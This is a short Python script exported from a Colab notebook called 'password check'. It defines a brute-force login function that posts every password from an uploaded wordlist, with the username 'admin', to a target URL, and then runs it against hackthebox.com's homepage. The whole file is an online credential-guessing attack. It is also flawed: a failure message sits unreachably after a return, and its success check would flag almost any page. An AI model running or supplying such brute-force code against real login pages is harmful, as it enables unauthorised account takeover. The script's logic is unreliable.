# -*- coding: utf-8 -*-
"""password check.ipynb

Automatically generated by Colab.

Original file is located at
    https://colab.research.google.com/drive/1VRWbBJ8fYJvSWlnW3A9R5mhSv_cyMxlK
"""

import requests

from google.colab import files
upload = files.upload()

def brute_force_login(target_url, username, password_list= "passwords.txt"):
  with open(password_list,"r") as file:
    for password in file.readlines():
      password = password.strip()
      data = {"username": username, "password": password}
      response = requests.post(target_url, data=data)
      if "login failed" not in response.text:
        print(f"possible credentials found : {username}:{password}")
        return
        print("no valid credentials found.")

target_url = "https://www.hackthebox.com/"

brute_force_login(target_url,"admin")